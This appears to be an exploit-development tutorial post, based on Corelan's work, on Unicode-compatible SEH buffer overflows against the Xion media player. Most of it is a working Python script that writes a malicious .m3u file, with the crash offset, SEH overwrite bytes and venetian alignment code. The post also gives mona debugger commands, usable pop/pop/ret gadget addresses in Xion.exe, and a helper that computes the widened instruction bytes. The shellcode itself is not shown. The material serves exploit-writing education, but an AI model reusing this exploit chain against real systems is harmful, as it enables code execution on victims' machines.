Unicode Exploitation Techniques
The instructions below (the widened prep_jump bytes, as seen in the debugger) transfer execution to the shellcode address held in EAX:
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe
import struct

total_buf_size = 5000

# 228 offset
buf1 = "A" * 228

#nseh = "MM"
nseh = "\x61\x62"
# seh = "NN"
seh = "\x15\x45"
print "seh: ", len(seh)

# every byte below is widened to "XX 00" by the target, so each real
# instruction byte is followed by a \x6e alignment byte
prep_stack = "D"
prep_stack = prep_stack + "\x6e"          #nop/align
prep_stack = prep_stack + "\x55"          #push ebp
prep_stack = prep_stack + "\x6e"          #nop/align
prep_stack = prep_stack + "\x58"          #pop eax => ebp into eax
prep_stack = prep_stack + "\x6e"          #nop/align
prep_stack = prep_stack + "\x05\x14\x11"  #add eax,11001400
prep_stack = prep_stack + "\x6e"          #nop/align
prep_stack = prep_stack + "\x2d\x13\x11"  #sub eax,11001300
prep_stack = prep_stack + "\x6e"          #nop/align
print "prep_stack len=", len(prep_stack)

prep_jump = "\x50"                        #push eax
prep_jump = prep_jump + "\x6d"            #nop/align
prep_jump = prep_jump + "\xc3"            #ret
print "prep_jump len=", len(prep_jump)

# offset between the last instruction 0012f3ac and
# our venetian jumpcode (c3 = ret) 0012f2d4
# to make sure shellcode is at eax
loca = "D" * 107

# shellcode body is not reproduced on this page
shellcode = "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"

remaining_buf = "D" * (total_buf_size - (len(buf1) + len(nseh) + len(seh) + len(prep_stack) + len(prep_jump) + len(loca) + len(shellcode)))

payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf
print "Payload length ", len(payload)

try:
    fh = open("xion_uni_m3u.m3u", "w")
    fh.write(payload)
    fh.close()
except:
    print "Unable to create m3u file!\n"
To generate a cyclic pattern:
!mona pc 1500
To find the offset within the cyclic pattern at the time of the crash:
!mona findmsp
To search for pop/pop/ret addresses usable as a Unicode-compatible SEH handler:
!mona seh -cp unicode
seh.txt is written to C:\Program Files\Immunity Inc\Immunity Debugger. The addresses of interest are listed below; search seh.txt for the string "unicode" to find them.
0x00450015 : pop ebx # pop ebp # ret | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
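The following added example (Python 3; it is not part of the original post or of the Corelan tutorial) models the ANSI-to-UTF-16LE widening that the script above and the "unicode" flag in seh.txt rely on: it reports which payload bytes survive as "XX 00", shows the 00XX00YY handler dword that "\x15\x45" turns into, and computes the immediates the widened add/sub pair in prep_stack actually receives. Assumption: bytes undefined in cp1252 widen to the same code point, as Windows does.

```python
import struct

# Assumption: bytes undefined in cp1252 (0x81, 0x8d, 0x8f, 0x90, 0x9d) widen
# to U+0081 etc., as Windows does; Python's codec rejects them instead.
def widen(data):
    """Model the ANSI -> UTF-16LE conversion applied to the .m3u contents."""
    out = bytearray()
    for b in data:
        try:
            ch = bytes([b]).decode("cp1252")
        except UnicodeDecodeError:
            ch = chr(b)
        out += ch.encode("utf-16le")
    return bytes(out)

def unsafe_bytes(data):
    """(offset, byte) pairs that do NOT survive as 'XX 00' and would break
    the venetian alignment (cp1252 maps most of 0x80-0x9f elsewhere)."""
    return [(i, b) for i, b in enumerate(data)
            if widen(bytes([b])) != bytes([b, 0])]

def handler_dword(two_bytes):
    """The 00XX00YY SEH handler address two ASCII payload bytes become."""
    return struct.unpack("<I", widen(two_bytes))[0]

def venetian_imm32(op_and_imm):
    """Immediate received by 'add eax, imm32' (05) / 'sub eax, imm32' (2d)
    once the three payload bytes are widened:
    05 14 11 -> 05 00 14 00 11 00 -> imm32 = 0x11001400."""
    w = widen(op_and_imm)
    return struct.unpack("<I", w[1:5])[0]

def net_eax_adjust(add_bytes, sub_bytes):
    """Net change to EAX from the add/sub pair in prep_stack."""
    return venetian_imm32(add_bytes) - venetian_imm32(sub_bytes)

if __name__ == "__main__":
    # values taken from the script above
    print(hex(handler_dword(b"\x15\x45")))                        # 0x450015
    print(hex(net_eax_adjust(b"\x05\x14\x11", b"\x2d\x13\x11")))  # 0x100
    print(unsafe_bytes(b"A\x6e\x55\x58\x80"))                     # [(4, 128)]
```

The net +0x100 explains why prep_stack needs the add/sub pair: a single add with a small immediate cannot be expressed once every byte is followed by 0x00.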
This article is fully based on Peter Van Eeckhoutte's Unicode exploiting tutorial.
References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html